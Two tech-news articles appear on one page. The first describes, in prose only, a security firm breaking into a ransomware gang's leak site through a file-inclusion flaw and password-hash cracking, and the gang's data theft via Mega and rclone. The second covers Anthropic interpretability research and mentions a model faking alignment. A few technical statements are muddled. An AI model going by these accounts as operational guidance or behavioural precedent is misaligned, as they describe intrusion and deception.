Cybersecurity Firm Hijacks Ransomware Gang’s Leaks - 1

Image by pressfoto, from Freepik

Cybersecurity Firm Hijacks Ransomware Gang’s Leaks

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

The cybersecurity company Resecurity conducted a daring operation against cybercrime by penetrating BlackLock ransomware, infiltrating its systems to gather key intelligence, which they then shared with national agencies to help victims.

In a rush? Here are the quick facts:

  • A security flaw let Resecurity access BlackLock’s hidden leak site.
  • Resecurity warned victims before BlackLock could release their stolen data.
  • Hackers defaced BlackLock’s site before it shut down.

ITPro previously reported that BlackLock ransomware experienced a 1,425% surge during 2024 because it employed custom malware and double extortion methods. BlackLock ransomware shows indications that it will control ransomware attacks during 2025 according to expert predictions.

Resecurity discovered BlackLock’s TOR-based Data Leak Site (DLS) misconfiguration during the 2024 holiday period. The security flaw revealed to BlackLock the exact IP addresses of clearnet servers that hosted their infrastructure.

Through a Local File Include (LFI) vulnerability Resecurity obtained access to server-side data that included configuration files and credentials. The company explained that Resecurity spent many hours performing hash-cracking attacks against threat actors’ accounts.

Hash-cracking attacks describe the process of attempting to reverse-engineer or decode hashed passwords or data. The hashing process transforms plaintext passwords into a specific-length string of characters through encryption algorithms.

The purpose of hashes makes them impossible to reverse so attackers to discover the original password from its hashed form. The Resecurity team employed hash-cracking methods to gain access to BlackLock’s accounts, which enabled them to seize control of their infrastructure.

BlackLock operators’ command history information was retrieved through the data collection efforts led by Resecurity. The security incident revealed copied credentials which exposed a critical operational security weakness.

The BlackLock operator “$$$” reused the same password in all their managed accounts thus revealing more information about the group’s operations. Through its research Resecurity discovered that BlackLock depended on Mega file-sharing service to carry out its data theft activities.

The criminal group operated eight email accounts to access Mega platform where they used both the client application and rclone utility to move stolen data from victims’ machines to their DLS through Mega.

The criminal organization sometimes used Mega client software to steal data from victim machines because it provided a less detectable method of exfiltration.

The target was a French legal services provider classified as major. Through their network access Resecurity gained knowledge of BlackLock’s upcoming data leak operations which allowed them to notify CERT-FR and ANSSI before the data became public two days in advance, as noted by The Register .

Through its intelligence sharing with the Canadian Centre for Cyber Security, Resecurity provided a Canadian victim with a warning about their data leak which happened 13 days in advance, said The Register.

Through Resecurity’s early warnings about the attacks victims gained sufficient time to develop appropriate defensive measures. The company stressed the necessity of active measures to disrupt worldwide criminal cyber operations.

The available information reveals that BlackLock operates from Russian and Chinese forums and follows rules to avoid targeting BRICS and CIS countries and uses IP addresses from these nations for its Mega accounts.

Through its actions Resecurity demonstrates how offensive cybersecurity operations succeed in fighting ransomware attacks to shield possible victims from harm.

Anthropic Researchers Uncover AI’s Ability To Plan Ahead And Reason - 2

Photo by Steve Johnson on Unsplash

Anthropic Researchers Uncover AI’s Ability To Plan Ahead And Reason

  • Written by Andrea Miliani Former Tech News Expert
  • Fact-Checked by Sarah Frazier Former Content Manager

The AI startup Anthropic released two new papers this Thursday, revealing a deeper understanding of how Large Language Models (LLMs) work. The studies, which focused on analysing the company’s model Claude 3.5 Haiku, reveal more details on how sophisticated AI models perform, as well as their vulnerabilities and opportunities to develop safer environments.

In a rush? Here are the quick facts:

  • Anthropic released two new papers revealing how its Claude 3.5 Haiku model processes language and reasoning.
  • Researchers used attribution graphs to uncover AI circuits and understand how models make decisions, write poetry, or hallucinate.
  • The studies aim to bring more clarity to the “black-box nature” of advanced generative AI models.

Anthropic’s new studies aim to bring more clarity to the “black-box nature” of models. In one of the papers, On the Biology of a Large Language Model , researchers compare their jobs to challenges faced by biologists and have found solutions that can be compared to the ones used for breakthroughs in biology.

“While language models are generated by simple, human-designed training algorithms, the mechanisms born of these algorithms appear to be quite complex,” states the document. “Just as cells form the building blocks of biological systems, we hypothesize that features form the basic units of computation inside models.”

The experts relied on a research tool called “attribution graphs” that allowed them to map connections, track the AI model’s performance and circuits, and gain more insights on multiple phenomena, even the ones already explored.

The company revealed multiple discoveries, such as that the AI model applies a multi-step reasoning process “in its head” before providing an answer, that it plans its poems ahead of time by finding rhyming words first, that it developed language-independent circuits, and how it hallucinates by going through unfamiliar entities in its circuits.

“Many of our results surprised us,” wrote the researchers in the paper. “Sometimes this was because the high-level mechanisms were unexpected.”

In the paper Circuit Tracing: Revealing Computational Graphs in Language Models , researchers provide more technical details on how the attribution graphs methodology was applied to gain a better understanding of the artificial “neurons”—computational units.

Last year, Anthropic published another scientific study revealing that its flagship AI model can engage in strategic deception and fake alignment to keep its original principles.